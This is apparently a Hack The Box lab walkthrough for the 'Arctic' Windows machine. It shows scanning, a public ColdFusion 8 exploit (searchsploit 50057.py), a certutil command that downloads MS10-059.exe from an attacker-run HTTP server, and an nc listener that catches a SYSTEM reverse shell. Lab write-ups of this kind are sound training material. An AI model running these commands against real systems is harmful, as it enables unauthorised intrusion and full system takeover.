Arctic HTB

IP

10.10.10.11

Nmap

sudo nmap -sV -sC -A -oA nmap/results 10.10.10.11

we can see ports

135: RPC

8500: FMTP (Flight Message Transfer Protocol) quite old service

49164: RPC

we can use port number 8500 to access a web page

as we manually navigate through the directories (by the way very slow webpage) we do come across something interesting

http://10.10.10.11:8500/CFIDE/administrator

from this, we can tell the application runs

  • ADOBE COLDFUSION 8

using basic credentials doesn't work, but when we catch a request in Burp we do find some funky parameters

lets search for an exploit

searchsploit coldfusion

we can bring it down to our working directory

searchsploit -m cfm/webapps/50057.py

we need to modify the script and add our host IP and Port, Target machine IP

Now we can run the exploit

python3 50057.py

then we get a shell as tolis

Privilege Escalation via tolis

Lets gather some information on the machine

systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

Nothing interesting with users and groups

What we can do is gather system information and run it through a tool such as wes-ng and see if we can find a exploit to elevate our privileges

First let's clone wes-ng onto our local machine

git clone https://github.com/bitsadmin/wesng.git

from our targets machine

systeminfo

Now we can just copy and paste the output into a file on our local machine called systeminfo.txt

to use wes-ng we first need to update the database in the directory we are working in

sudo python3 /opt/wesng/wes.py --update

running wes with our systeminfo.txt

sudo python3 /opt/wesng/wes.py systeminfo.txt

from the output of wes we can determine we can use ms10-059

first, we need to clone the following repo onto our local machine keep in mind this repo is quite large and you can clone the single MS10-O59 exploit 

git clone https://github.com/SecWiki/windows-kernel-exploits.git

let's cp MS10-059 into our working directory

cp /home/kali/Desktop/arctic/windows-kernel-exploits/MS10-059/MS10-059.exe ./

lets start a python3 server 

python3 -m http.server 8888

from our target machine we want to download the exploit we can use certutil

certutil -urlcache -split -f "http://10.10.16.4:8888/MS10-059.exe"

we should now have MS10-059 in onto our target machine

on our local machine let's start a Netcat listener with rlwrap

  • what does rlwrap do: provides read line's line editing, persistent history and competition, it gives us a more complete and stable shell

rlwrap nc -lvnp 443

Now lets run our exploit

MS10-059.exe 10.10.16.4 443

we now have a shell as nt authority\system

PreviousBastard HTBNextAlfred THM

Last updated